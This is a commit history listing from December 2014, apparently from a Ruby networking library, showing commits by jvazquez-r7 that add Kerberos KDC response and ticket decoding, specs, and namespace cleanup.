Add support to decode the encryption part of as responses
2014-12-15 11:46:11 -06:00
jvazquez-r7
d81cdd6cbb
Add KdcResponse spec first draft
2014-12-14 21:20:54 -06:00
jvazquez-r7
c3a2bcf956
Make KdcResponse decoding better
2014-12-14 21:01:09 -06:00
jvazquez-r7
442adb080f
Add first support to decode tickets
2014-12-14 20:51:26 -06:00
jvazquez-r7
35742873c7
Delete references to deleted namespaces
2014-12-14 19:23:21 -06:00
jvazquez-r7
78c76092dd
Delete namespaces from model classes
2014-12-14 19:18:30 -06:00
jvazquez-r7
13ae624738
Delete namespaces
2014-12-14 19:15:57 -06:00
jvazquez-r7
2d0cb5acd8
Move elements to model dir
2014-12-14 19:11:21 -06:00
jvazquez-r7
328e9f62e8
Add first draft for Kerberos responses
2014-12-14 19:09:41 -06:00
jvazquez-r7
483c273e17
Add support to decode responses on the Rex client
2014-12-14 17:54:17 -06:00
jvazquez-r7
883bfd1f46
Add support to retrieve e-data
2014-12-14 17:23:37 -06:00